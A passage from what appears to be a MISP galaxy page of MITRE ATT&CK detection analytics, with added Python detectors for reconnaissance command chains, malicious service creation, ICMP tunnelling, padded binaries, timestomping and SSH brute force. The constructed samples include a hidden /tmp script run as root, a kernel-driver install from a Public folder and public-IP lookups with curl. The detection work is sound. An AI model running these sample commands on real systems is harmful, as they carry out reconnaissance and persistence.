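     re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+")),
    (5, "external connectivity or public IP resolution",
     re.compile(r"\b(curl|wget|dig)\b.*(ifconfig\.me|ipinfo\.io|ip-api\.com|icanhazip|myip\.opendns\.com|checkip)")),
]

# Constructed process events: (ISO timestamp, host, session id, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("2024-05-06T02:00:01", "db2", "s17", "uname -a"),
    ("2024-05-06T02:00:02", "db2", "s17", "hostname"),
    ("2024-05-06T02:00:04", "db2", "s17", "cat /etc/os-release"),
    ("2024-05-06T02:00:05", "db2", "s17", "dpkg -l"),
    ("2024-05-06T02:00:07", "db2", "s17", "id"),
    ("2024-05-06T02:00:09", "db2", "s17", "curl -s ifconfig.me"),
    ("2024-05-06T02:00:12", "db2", "s17", "sh -c '[ \"$(id -u)\" = 0 ] && /tmp/.x/run.sh'"),
    ("2024-05-06T09:15:00", "db2", "s20", "uname -r"),   # an admin checking a kernel version
    ("2024-05-06T09:15:30", "db2", "s20", "ps aux"),
]


def classify(cmdline):
    """Return the stage number the command line matches (first match wins), or None."""
    for num, _, rx in STAGES:
        if rx.search(cmdline):
            return num
    return None


def detect_chains(events):
    """events: [(iso_timestamp, host, session, cmdline)]. Alert once per (host, session) whose
    commands cover at least MIN_STAGES distinct stages within WINDOW of each other."""
    seen = {}        # (host, session) -> {stage: most recent sighting}
    alerted = set()
    alerts = []
    for ts_str, host, session, cmd in sorted(events):
        stage = classify(cmd)
        if stage is None:
            continue
        ts = datetime.fromisoformat(ts_str)
        stages = seen.setdefault((host, session), {})
        stages[stage] = ts
        in_window = {s: t for s, t in stages.items() if ts - t <= WINDOW}
        if len(in_window) >= MIN_STAGES and (host, session) not in alerted:
            alerted.add((host, session))
            alerts.append({"host": host, "session": session, "stages": sorted(in_window),
                           "first": min(in_window.values()).isoformat(), "last": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert)
```

Session s17 trips the detector at the connectivity check (stages 1, 2, 3 and 5 within eight seconds); the later admin session s20 only covers two stages and stays quiet. Individual stages such as uname or ps are far too common to alert on alone, which is why the chain, not the command, is the signal.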

Internal MISP references

UUID 31027842-f02c-4bc3-8cd6-3e4b533da5ac which can be used as unique global reference for Analytic 1552 - AN1552 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1552
mitre_platforms ['Linux']

Analytic 1255 - AN1255

ICMP or raw socket traffic generated by user-mode processes like bash, Python, or nc, typically using ping, hping3, or crafted packets via libpcap or scapy.

Internal MISP references

UUID 7d0a3871-8cee-47bd-8829-637e132c98f7 which can be used as unique global reference for Analytic 1255 - AN1255 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1255
mitre_platforms ['Linux']

Analytic 1526 - AN1526

Password guessing attempts against web-based apps (e.g., Dropbox, Google Workspace) reflected in API or sign-in logs

Internal MISP references

UUID 1d8bc80f-8719-41f0-a73e-127d6830f516 which can be used as unique global reference for Analytic 1526 - AN1526 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1526
mitre_platforms ['SaaS']

Analytic 1265 - AN1265

Same source IP performing multiple authentication attempts using known breached username/password combinations across different identities in Azure AD, Okta, or Duo

Internal MISP references

UUID 24e6cefb-6e1c-4676-9bb8-74f6a731703c which can be used as unique global reference for Analytic 1265 - AN1265 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1265
mitre_platforms ['Identity Provider']

Analytic 1256 - AN1256

Unsigned binaries or interpreted scripts initiating non-standard protocols (ICMP, UDP, SOCKS) outside of baseline network behavior.

Internal MISP references

UUID 4742e058-a301-47e1-b594-8daa8eabfc79 which can be used as unique global reference for Analytic 1256 - AN1256 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1256
mitre_platforms ['macOS']

Analytic 1625 - AN1625

Adversary modifies content in cloud-hosted websites (e.g., AWS S3-backed, Azure Blob-hosted sites) by gaining access to management consoles or APIs and uploading altered HTML/JS files.

Internal MISP references

UUID afd585f3-20fa-4bd8-8930-243cb5dbe5f8 which can be used as unique global reference for Analytic 1625 - AN1625 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1625
mitre_platforms ['IaaS']

Analytic 1562 - AN1562

Processes executing commands to query system locale and language settings, such as 'locale', 'echo $LANG', or parsing environment variables. Suspicious activity is indicated by these commands being run by unusual users, automation scripts, or non-administrative processes.

Internal MISP references

UUID c625c090-edcc-431a-a2fb-c31e4eb5f2cf which can be used as unique global reference for Analytic 1562 - AN1562 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1562
mitre_platforms ['Linux']

Analytic 1652 - AN1652

The user can view a list of device administrators in device settings and revoke permission where appropriate. Applications that request device administrator permissions should be scrutinized further for malicious behavior.

Internal MISP references

UUID a5c4230b-7064-4863-9a60-e0565042d452 which can be used as unique global reference for Analytic 1652 - AN1652 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1652
mitre_platforms ['Android']

Analytic 1572 - AN1572

Processes such as curl, wget, rclone, or custom scripts executing uploads to cloud storage endpoints. Defender perspective: detect chained events where tar/gzip is executed to compress files followed by HTTPS PUT/POST requests to known storage services.

Internal MISP references

UUID 5012d2b2-bd36-431c-91d3-4c10b7d3a9d6 which can be used as unique global reference for Analytic 1572 - AN1572 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1572
mitre_platforms ['Linux']

Analytic 1257 - AN1257

VMCI (Virtual Machine Communication Interface) traffic between guest and host, or between VMs, originating from non-management tools or unauthorized binaries.

Internal MISP references

UUID cae917e6-7542-41d0-8b03-ad2b7ab1eb01 which can be used as unique global reference for Analytic 1257 - AN1257 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1257
mitre_platforms ['ESXi']

Analytic 1275 - AN1275

High volume of failed logon attempts followed by a successful one from a suspicious user, host, or timeframe

Internal MISP references

UUID db50537c-9234-4350-9bf0-838d4cffbd34 which can be used as unique global reference for Analytic 1275 - AN1275 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1275
mitre_platforms ['Windows']

Analytic 1527 - AN1527

Detects creation or modification of Windows Services through command-line tools (e.g., sc.exe, powershell.exe), Registry key changes under HKLM\System\CurrentControlSet\Services, and service execution under SYSTEM with unsigned or anomalous binary paths. Detects privilege escalation via driver installation or CreateServiceW usage. Correlates parent-child lineage, startup behavior, and rare service names.
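The command-line side of this analytic is easy to prototype. The Python below is an added example for this page (not MITRE's content and not a product rule): it normalises sc.exe create and New-Service command lines into a service definition and applies the AN1527 checks that can be made from the command line alone, namely a binary path under a user-writable location, a driver (type= kernel or filesys), an unquoted path containing spaces, and a boot or system start type. The sample command lines are constructed; signature status is not available from a command line, so the unsigned-binary check would have to come from image-load or EDR telemetry and is not attempted here.

```python
import re

# Paths a standard user can write to; a service binary here is anomalous under AN1527.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "\\temp\\", "\\appdata\\", "c:\\perflogs\\", "\\public\\")

SC_CREATE_RE = re.compile(r"\bsc(?:\.exe)?\s+(?:\\\\\S+\s+)?create\s+(?P<name>\S+)\s+(?P<args>.*)", re.I)
# sc.exe options are written "key= value" (note the space after '='); values may be quoted or may
# contain spaces unquoted, so an unquoted value runs until the next "key=" token or end of line.
SC_OPT_RE = re.compile(r'(?P<key>binpath|type|start|obj|displayname)=\s*(?P<val>"[^"]*"|.*?)(?=\s+\w+=|\s*$)', re.I)
PS_NEW_SERVICE_RE = re.compile(r"\bNew-Service\b(?P<args>.*)", re.I)
PS_OPT_RE = re.compile(r'''-(?P<key>Name|BinaryPathName|StartupType)\s+(?P<val>"[^"]*"|'[^']*'|\S+)''', re.I)

# Constructed command lines (not from a real incident) as process telemetry would record them.
SAMPLE_CMDLINES = [
    r'sc.exe create WinDefendHelper binPath= "C:\ProgramData\svc\helper.exe" start= auto',
    r"sc create badDrv type= kernel binPath= C:\Users\Public\drv.sys start= demand",
    r"powershell.exe New-Service -Name Updater -BinaryPathName 'C:\Program Files\Vendor\updater.exe' -StartupType Automatic",
    r"sc create legacy binPath= C:\Program Files\Old App\svc.exe",
    "cmd.exe /c dir",
]


def parse_service_creation(cmdline):
    """Normalise an sc.exe create or New-Service command line; None if it creates no service."""
    m = SC_CREATE_RE.search(cmdline)
    if m:
        opts = {k.lower(): v for k, v in SC_OPT_RE.findall(m["args"])}
        raw = opts.get("binpath", "")
        return {"name": m["name"], "binpath_raw": raw, "binpath": raw.strip('"'),
                "type": opts.get("type", "own"), "start": opts.get("start", "demand")}
    m = PS_NEW_SERVICE_RE.search(cmdline)
    if m:
        opts = {k.lower(): v for k, v in PS_OPT_RE.findall(m["args"])}
        raw = opts.get("binarypathname", "")
        return {"name": opts.get("name", "").strip("\"'"), "binpath_raw": raw, "binpath": raw.strip("\"'"),
                "type": "own", "start": opts.get("startuptype", "Automatic")}
    return None


def risk_reasons(svc):
    """AN1527 indicators derivable from one parsed service definition."""
    reasons = []
    path = svc["binpath"].lower()
    if any(marker in path for marker in USER_WRITABLE):
        reasons.append("service binary under a user-writable path")
    if svc["type"].lower() in ("kernel", "filesys"):
        reasons.append("driver installation (type= %s)" % svc["type"])
    if " " in svc["binpath"] and not svc["binpath_raw"].startswith(('"', "'")):
        reasons.append("unquoted service path containing spaces")
    if svc["start"].lower() in ("boot", "system"):
        reasons.append("early-start service (start= %s)" % svc["start"])
    return reasons


def review(cmdlines):
    """Return (cmdline, parsed service, reasons) for every service-creating command line."""
    out = []
    for c in cmdlines:
        svc = parse_service_creation(c)
        if svc is not None:
            out.append((c, svc, risk_reasons(svc)))
    return out


if __name__ == "__main__":
    for cmd, svc, reasons in review(SAMPLE_CMDLINES):
        print(svc["name"], svc["binpath"], reasons or "no command-line indicators")
```

The vendor-style New-Service line produces no indicators, which is the point: the command-line checks narrow the candidates, and the remaining signals in the analytic (registry change under the Services key, parent lineage, rarity of the service name, signature of the image) are what separate the rest.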

Internal MISP references

UUID ffaa281c-dd99-486d-bc7f-225580f784f4 which can be used as unique global reference for Analytic 1527 - AN1527 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1527
mitre_platforms ['Windows']

Analytic 1725 - AN1725

Application vetting services can detect certificate pinning by examining an application’s network_security_config.xml file, although this behavior can be benign.

Internal MISP references

UUID 05191336-6d06-41f7-babb-5d079e4168ae which can be used as unique global reference for Analytic 1725 - AN1725 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1725
mitre_platforms ['Android']

Analytic 1752 - AN1752

Application vetting services can look for applications requesting the android.permission.BIND_ACCESSIBILITY_SERVICE permission in a service declaration. On Android, the user can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions. On Android, the user can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, the user can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard.

Internal MISP references

UUID 7f8717e8-fea8-42db-b60c-c64375630685 which can be used as unique global reference for Analytic 1752 - AN1752 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1752
mitre_platforms ['iOS']

Analytic 1258 - AN1258

Non-standard port/protocol pairings, or ICMP traffic whose shape resembles tunneling rather than diagnostic pings (e.g., fixed-size echo payloads sent at regular intervals, or payload sizes and entropy that do not match a standard ping pattern).
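The ICMP half of this analytic is a per-flow statistics problem, so here is an added Python example (written for this page, not MITRE's or any vendor's logic) that computes the relevant features over constructed echo-request records: payload-size variance, the coefficient of variation of inter-packet gaps, mean Shannon entropy of the payload, and whether the payload looks like a stock ping pattern (the Windows "abcdefghijklmnopqrstuvwabcdefghi" string, or the ascending byte run that iputils-style pings carry). A flow is called tunnel-like when its payloads are not ping patterns and are either high-entropy or a fixed-size metronomic beacon. Thresholds and the three sample flows are assumptions for the example.

```python
import hashlib
import math
import statistics
from collections import defaultdict

MIN_PACKETS = 5
ENTROPY_THRESHOLD = 6.0   # bits per byte; diagnostic ping payloads are far below this
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def shannon_entropy(data):
    """Bits of entropy per byte of a payload."""
    if not data:
        return 0.0
    counts = defaultdict(int)
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_ping_pattern(payload):
    """True for the stock Windows payload or a payload ending in an ascending byte run (iputils/BSD style)."""
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    tail = payload[-16:]
    return len(tail) == 16 and all((tail[i] + 1) & 0xFF == tail[i + 1] for i in range(15))


def is_tunnel_like(f):
    """AN1258 decision: enough packets, payloads that are not ping patterns, and either high entropy
    (encapsulated or encrypted data) or a fixed-size beacon on a fixed interval."""
    if f["count"] < MIN_PACKETS or f["ping_pattern_ratio"] >= 0.5:
        return False
    if f["mean_entropy"] > ENTROPY_THRESHOLD:
        return True
    return f["size_stdev"] == 0 and f["gap_cv"] is not None and f["gap_cv"] < 0.1


def flow_features(packets):
    """packets: [(seconds, payload_bytes), ...] for one src->dst echo-request stream."""
    packets = sorted(packets, key=lambda p: p[0])
    sizes = [len(p) for _, p in packets]
    gaps = [b - a for (a, _), (b, _) in zip(packets, packets[1:])]
    mean_gap = statistics.mean(gaps) if gaps else 0.0
    feats = {
        "count": len(packets),
        "size_stdev": statistics.pstdev(sizes),
        "gap_cv": statistics.pstdev(gaps) / mean_gap if len(gaps) > 1 and mean_gap > 0 else None,
        "mean_entropy": statistics.mean(shannon_entropy(p) for _, p in packets),
        "ping_pattern_ratio": sum(looks_like_ping_pattern(p) for _, p in packets) / len(packets),
    }
    feats["tunnel_like"] = is_tunnel_like(feats)
    return feats


def analyze(records):
    """records: [(seconds, src, dst, payload)] echo requests; returns features keyed by (src, dst)."""
    flows = defaultdict(list)
    for t, src, dst, payload in records:
        flows[(src, dst)].append((t, payload))
    return {flow: flow_features(pkts) for flow, pkts in flows.items()}


# Constructed packets (no real capture): a diagnostic ping, a high-entropy tunnel, a zero-filled beacon.
LINUX_STYLE_PAYLOAD = bytes(16) + bytes(range(0x10, 0x38))   # timestamp stand-in + ascending pattern
SAMPLE_PACKETS = (
    [(100.0 + i * 1.0 + j, "10.0.0.5", "10.0.0.1", LINUX_STYLE_PAYLOAD)
     for i, j in enumerate((0.0, 0.004, -0.002, 0.001, 0.003, -0.001))]
    + [(200.0 + i * 3.7, "10.0.0.23", "203.0.113.50",
        b"".join(hashlib.sha256(b"chunk%d-%d" % (i, k)).digest() for k in range(8)))  # stand-in for ciphertext
       for i in range(6)]
    + [(300.0 + i * 0.5, "10.0.0.24", "203.0.113.51", bytes(64)) for i in range(8)]
)

if __name__ == "__main__":
    for flow, feats in analyze(SAMPLE_PACKETS).items():
        print(flow, feats)
```

Two caveats a practitioner will hit immediately: hping3 and nmap host discovery also send payloads that fail the ping-pattern test, so this fires on scanners as well as tunnels (arguably still worth seeing, as AN1255 notes), and a tunnel that pads with a stock ping pattern will pass the pattern check, which is why the entropy and beacon features are kept alongside it rather than relying on any one of them.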

Internal MISP references

UUID 688ed638-d3ba-47dc-baa7-16b16a9fe9c8 which can be used as unique global reference for Analytic 1258 - AN1258 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1258
mitre_platforms ['Network Devices']

Analytic 1285 - AN1285

Use of known default service accounts or root-level cloud accounts performing authentication or changes to IAM policy.

Internal MISP references

UUID a8ed4e86-c79a-40db-84e5-1b4cf0e917d3 which can be used as unique global reference for Analytic 1285 - AN1285 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1285
mitre_platforms ['Identity Provider']

Analytic 1582 - AN1582

Detects use of built-in SaaS sharing mechanisms to transfer ownership or share access of critical data to external tenants or untrusted users through API calls or link generation features.

Internal MISP references

UUID d1ef9a86-7781-4b9e-9178-c2e5b1782c1f which can be used as unique global reference for Analytic 1582 - AN1582 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1582
mitre_platforms ['SaaS']

Analytic 1528 - AN1528

Detects the creation or execution of padded binary files (e.g., large size but minimal legitimate content) followed by process execution or lateral movement from the host.

Internal MISP references

UUID f9079cb0-76ff-4b4a-a73c-4f6572e7eef5 which can be used as unique global reference for Analytic 1528 - AN1528 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1528
mitre_platforms ['Windows']

Analytic 1852 - AN1852

Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.

Internal MISP references

UUID 739bd746-e98b-45cb-8bc6-3c8876745b4a which can be used as unique global reference for Analytic 1852 - AN1852 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1852
mitre_platforms ['iOS']

Analytic 1825 - AN1825

The user can view and manage installed third-party keyboards. Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.

Internal MISP references

UUID 9b036696-9e1e-42b9-9bfd-3ae785e7e10e which can be used as unique global reference for Analytic 1825 - AN1825 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1825
mitre_platforms ['Android']

Analytic 1592 - AN1592

Modification of the Thunderbird message filter file (msgFilterRules.dat in the profile) or execution of mail-processing tools (e.g., formail/procmail) together with changes to ~/.forward or ~/.procmailrc that alter where mail is delivered.

Internal MISP references

UUID 22e6f5f4-e4cc-449c-9dba-280788935ce5 which can be used as unique global reference for Analytic 1592 - AN1592 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1592
mitre_platforms ['Linux']

Analytic 1952 - AN1952

Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 3d01d29d-30f1-4b3b-bf04-54aca340a8eb which can be used as unique global reference for Analytic 1952 - AN1952 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1952
mitre_platforms ['PRE']

Analytic 1529 - AN1529

Detects abnormal creation of binary files with significant size that are subsequently executed or accessed by non-standard users.
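AN1528 (Windows) and the Linux variant above both hinge on recognising a padded file, so one added example serves both. The Python below is written for this page (not MITRE's or any product's logic): it streams a file in 1 MiB chunks, measures what share of the file is a single repeated byte value and how long the run of that byte is at the end of the file (appended padding shows up as a long trailing run), and gates the verdict on a minimum size. It writes two constructed sample files into a temporary directory to demonstrate; the 100 MiB default size gate is an assumption chosen because padding is used to push binaries past scan-size limits.

```python
import os
import tempfile
from collections import Counter

CHUNK = 1 << 20
DEFAULT_MIN_SIZE = 100 << 20   # assumption: padding exists to exceed AV/EDR scan-size limits
PAD_FRACTION = 0.9


def padding_profile(path):
    """Size, share of the file taken by its most common byte value, and the length of the run
    of that byte at the very end of the file."""
    counts = Counter()
    trailing_run, last_byte = 0, None
    with open(path, "rb") as fh:
        while chunk := fh.read(CHUNK):
            counts.update(chunk)
            b = chunk[-1]
            run_here = len(chunk) - len(chunk.rstrip(bytes([b])))
            # a run continues across chunks only if the whole chunk is that byte and it matches the previous chunk's tail
            trailing_run = trailing_run + run_here if run_here == len(chunk) and last_byte == b else run_here
            last_byte = b
    size = sum(counts.values())
    byte, n = counts.most_common(1)[0] if counts else (None, 0)
    return {"size": size, "dominant_byte": byte,
            "dominant_fraction": n / size if size else 0.0, "trailing_run": trailing_run}


def is_padded(path, min_size=DEFAULT_MIN_SIZE, pad_fraction=PAD_FRACTION):
    """AN1528/AN1529 heuristic: a large file whose content is mostly one repeated byte."""
    p = padding_profile(path)
    return p["size"] >= min_size and p["dominant_fraction"] >= pad_fraction


def make_samples():
    """Write two constructed files into a temp dir: a padded one (64 KiB of random header-like bytes
    followed by 3 MiB of zeros) and a normal-looking one (2 MiB of random bytes)."""
    d = tempfile.mkdtemp(prefix="padcheck-")
    padded = os.path.join(d, "padded.bin")
    normal = os.path.join(d, "normal.bin")
    with open(padded, "wb") as fh:
        fh.write(os.urandom(65535) + b"\xff")   # header ends in a non-zero byte so the zero run is exactly 3 MiB
        fh.write(bytes(3 << 20))
    with open(normal, "wb") as fh:
        fh.write(os.urandom(2 << 20))
    return {"padded": padded, "normal": normal}


if __name__ == "__main__":
    for name, path in make_samples().items():
        print(name, padding_profile(path), is_padded(path, min_size=1 << 20))
```

Installers and archives that carry large zero-filled resources will also score high on dominant_fraction, so in practice the verdict is best paired with the second half of the analytic: the padded file being executed, or touched by a user who does not normally handle binaries.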

Internal MISP references

UUID 5523b4ab-42b1-480a-854b-819879905f8d which can be used as unique global reference for Analytic 1529 - AN1529 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1529
mitre_platforms ['Linux']

Analytic 1259 - AN1259

Adversary modifies Active Directory domain trust settings via netdom, nltest, or PowerShell to add new domain trust or alter federation. Modifications occur in AD object attributes like trustDirection, trustType, trustAttributes, often paired with SeEnableDelegationPrivilege or certificate injection.

Internal MISP references

UUID c84ed29d-c0bf-465c-9e4a-7685cd4ff444 which can be used as unique global reference for Analytic 1259 - AN1259 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1259
mitre_platforms ['Windows']

Analytic 1295 - AN1295

Detection of binaries spawning encrypted sessions using OpenSSL or curl to external services with mismatched ports/protocols. Identifies behavior where internal services simulate trusted cloud service traffic patterns.

Internal MISP references

UUID d27a6df2-b2df-443e-8e01-c90243465ceb which can be used as unique global reference for Analytic 1295 - AN1295 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1295
mitre_platforms ['Linux']

Analytic 1626 - AN1626

Detects attempts to modify file timestamps via API usage (e.g., SetFileTime), command-line tooling (e.g., PowerShell setting a file's CreationTime or LastWriteTime properties), or inconsistencies between the NTFS $STANDARD_INFORMATION ($SI) and $FILE_NAME ($FN) timestamps, such as $SI values that predate $FN or have been reverted.

Internal MISP references

UUID 475a8817-1ace-4bef-baaa-0f56979eb85a which can be used as unique global reference for Analytic 1626 - AN1626 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1626
mitre_platforms ['Windows']

Analytic 1266 - AN1266

Multiple sign-in failures against cloud-based applications using username/password combinations leaked from unrelated domains

Internal MISP references

UUID cfff571f-eb6b-41e2-a447-f69bc07aa77a which can be used as unique global reference for Analytic 1266 - AN1266 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1266
mitre_platforms ['SaaS']

Analytic 1662 - AN1662

Unexpected behavior from an application could be an indicator of masquerading. Application vetting services may potentially determine if an application contains suspicious code and/or metadata.

Internal MISP references

UUID 155b0dfd-15d5-45bd-a8c4-249adc52f20d which can be used as unique global reference for Analytic 1662 - AN1662 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1662
mitre_platforms ['iOS']

Analytic 1267 - AN1267

Router, firewall, or syslog logs showing authentication failures for many distinct usernames with reused credentials from the same source IP

Internal MISP references

UUID 4a930e8d-75eb-469d-82d8-1e1d5764a6d4 which can be used as unique global reference for Analytic 1267 - AN1267 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1267
mitre_platforms ['Network Devices']

Analytic 1627 - AN1627

Detects use of timestamp-altering commands like touch -a -m -t or touch -r, particularly when executed by unusual users or in suspicious directories.
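AN1626 (Windows) and this Linux analytic share the same forensic tell, so one added example covers both. The Python below is written for this page (not MITRE's content or any forensic tool's code) and checks two indicators: on NTFS, a $STANDARD_INFORMATION created time earlier than the $FILE_NAME created time (user-mode APIs such as SetFileTime can rewrite $SI but only the kernel writes $FN), and on either platform, timestamps whose sub-second part is exactly zero, which is what SetFileTime-based tools and touch -t or touch -d leave behind because they work in whole seconds. The MFT-style records and the st_mtime_ns values are constructed.

```python
from datetime import datetime


def split_ts(value):
    """Split an NTFS-style ISO timestamp 'YYYY-MM-DDTHH:MM:SS.fffffff' into a second-precision
    datetime and the fractional part as an integer count of 100-ns ticks."""
    base, _, frac = value.partition(".")
    ticks = int((frac + "0000000")[:7]) if frac else 0
    return datetime.strptime(base, "%Y-%m-%dT%H:%M:%S"), ticks


def ntfs_timestomp_indicators(rec):
    """AN1626 indicators for one MFT record carrying $SI and $FN timestamps."""
    reasons = []
    si_created, si_created_ticks = split_ts(rec["si_created"])
    _, si_modified_ticks = split_ts(rec["si_modified"])
    fn_created, _ = split_ts(rec["fn_created"])
    if si_created < fn_created:
        reasons.append("$SI created predates $FN created")
    if si_created_ticks == 0 and si_modified_ticks == 0:
        reasons.append("$SI timestamps carry zero sub-second precision")
    return reasons


def zero_fraction(ns_value):
    """AN1627 counterpart for Linux stat output: touch -t and touch -d write whole seconds,
    so st_atime_ns / st_mtime_ns end in nine zeros."""
    return ns_value % 1_000_000_000 == 0


def scan(records):
    """Map each path with at least one indicator to its reasons."""
    out = {}
    for rec in records:
        reasons = ntfs_timestomp_indicators(rec)
        if reasons:
            out[rec["path"]] = reasons
    return out


# Constructed MFT-style records (not from a real image).
SAMPLE_RECORDS = [
    {"path": r"C:\Windows\System32\svchost.exe",
     "si_created": "2019-12-07T09:14:52.3281250", "si_modified": "2019-12-07T09:14:52.3281250",
     "fn_created": "2019-12-07T09:14:52.3281250"},
    {"path": r"C:\Users\Public\update.exe",                 # $SI pushed back years before $FN: backdated
     "si_created": "2012-03-01T10:00:00.0000000", "si_modified": "2012-03-01T10:00:00.0000000",
     "fn_created": "2024-05-06T02:11:09.1182360"},
    {"path": r"C:\ProgramData\cache.dll",                    # $SI consistent with $FN to the second, but zeroed fraction
     "si_created": "2024-05-06T02:10:00.0000000", "si_modified": "2024-05-06T02:10:00.0000000",
     "fn_created": "2024-05-06T02:10:00.4471190"},
]

# Constructed Linux st_mtime_ns values: one set by touch -t, one written normally by the kernel.
SAMPLE_MTIME_NS = {"/tmp/.x/run.sh": 1714961400000000000, "/etc/hostname": 1714961400447119000}

if __name__ == "__main__":
    print(scan(SAMPLE_RECORDS))
    print({p: zero_fraction(ns) for p, ns in SAMPLE_MTIME_NS.items()})
```

Both indicators have benign sources that the analyst has to rule out: a file moved or renamed within a volume legitimately carries an $SI created time older than its $FN, and files extracted from ZIP archives or copied from FAT media arrive with whole-second or two-second timestamps. The unusual-user and suspicious-directory conditions in the analytic text are what keep these heuristics from paging on every extracted archive.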

Internal MISP references

UUID 632f7aef-f848-4147-95fa-2052bd373576 which can be used as unique global reference for Analytic 1627 - AN1627 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1627
mitre_platforms ['Linux']

Analytic 1276 - AN1276

Multiple authentication failures for valid or invalid users followed by success from same IP/user
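This analytic and AN1284 (password logins to default accounts over SSH, earlier on this page) both read the same sshd log lines, so one added example serves both. The Python below is written for this page (not MITRE's content or any SIEM's rule) and parses constructed syslog-format sshd lines: one function lists successful password logins to default accounts, the other tracks failures per source address in a five-minute window and reports a source that crosses a failure threshold and then succeeds. The log lines, the threshold and the window are assumptions for the example; syslog timestamps carry no year, so the parser takes one as a parameter.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in the default syslog format (not from a real host).
SAMPLE_LOG = """\
May  6 03:14:01 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.9 port 50112 ssh2
May  6 03:14:03 web1 sshd[2203]: Failed password for root from 203.0.113.9 port 50114 ssh2
May  6 03:14:05 web1 sshd[2205]: Failed password for root from 203.0.113.9 port 50116 ssh2
May  6 03:14:07 web1 sshd[2207]: Failed password for root from 203.0.113.9 port 50118 ssh2
May  6 03:14:09 web1 sshd[2209]: Failed password for root from 203.0.113.9 port 50120 ssh2
May  6 03:14:12 web1 sshd[2211]: Accepted password for root from 203.0.113.9 port 50122 ssh2
May  6 09:02:44 web1 sshd[3100]: Accepted publickey for deploy from 192.0.2.20 port 41000 ssh2: ED25519 SHA256:abc
May  6 09:30:00 web1 sshd[3200]: Failed password for alice from 192.0.2.21 port 41010 ssh2
May  6 09:30:20 web1 sshd[3202]: Accepted password for alice from 192.0.2.21 port 41012 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)
DEFAULT_ACCOUNTS = {"root", "admin", "administrator", "ubuntu", "pi", "ec2-user"}
FAIL_THRESHOLD = 4            # assumption: four failures inside the window before a success is suspicious
WINDOW = timedelta(minutes=5)


def parse(log_text, year=2024):
    """Return (timestamp, result, method, user, src) tuples; lines that do not match are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["src"]))
    return events


def default_account_password_logins(events):
    """AN1284: successful logins to default accounts that used a password rather than a key."""
    return [(ts, user, src) for ts, result, method, user, src in events
            if result == "Accepted" and method == "password" and user in DEFAULT_ACCOUNTS]


def brute_force_then_success(events):
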